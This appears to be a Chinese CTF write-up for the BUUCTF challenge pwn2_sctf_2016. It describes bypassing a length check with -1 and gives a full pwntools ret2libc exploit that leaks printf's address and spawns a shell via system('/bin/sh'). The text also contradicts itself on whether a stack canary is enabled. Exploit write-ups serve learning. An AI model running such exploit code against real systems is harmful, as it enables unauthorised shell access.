pwn2_sctf_2016

pwn2_sctf_2016

使用checksec查看:在这里插入图片描述
开启了栈不可执行和Canary。

先放进IDA中分析:
在这里插入图片描述

  • 主函数给出了vuln()函数,直接跟进。

vuln()
在这里插入图片描述

  • get_n((int)&nptr, 4u);:获取数据长度,用户可控。
  • if ( v2 > 32 ):若长度超过32,退出程序。
  • get_n((int)&nptr, v2); return printf("You said: %s\n", &nptr);:获取用户的输入并输出。

题目思路

  • 判断长度可用-1进行绕过。
  • 没有Canary,不限长度后可以利用栈溢出。
  • 使用ret2libc的方式getshell。

步骤解析

无需

完整exp

from pwn import *

#start
r = remote("node4.buuoj.cn",27834)
# r = process("../buu/pwn2_sctf_2016")
elf = ELF("../buu/pwn2_sctf_2016")
libc = ELF("../buu/ubuntu16(32).so")

#params
printf_got = elf.got['printf']
printf_plt = elf.plt['printf']
main_addr = elf.symbols['main']
str_addr = 0x80486F8
do_thing_addr = 0x80484D0

#attack
r.sendlineafter("read? ","-1")
payload = b'M'*(0x2C+4) + p32(printf_plt) + p32(main_addr) + p32(str_addr) + p32(printf_got)
r.sendlineafter("data!\n",payload)
r.recvuntil("said: ")
r.recvuntil('said: ')
printf_addr = u32(r.recv(4))

#libc
base_addr = printf_addr - libc.symbols['printf']
system_addr = base_addr + libc.symbols['system']
bin_sh_addr = base_addr + next(libc.search(b'/bin/sh'))

#attack2
r.sendlineafter("read? ","-1")
payload = b'M'*(0x2C+4) + p32(system_addr) + b'M'*4 + p32(bin_sh_addr)
r.sendlineafter("data!\n",payload)

r.interactive()
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 3
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值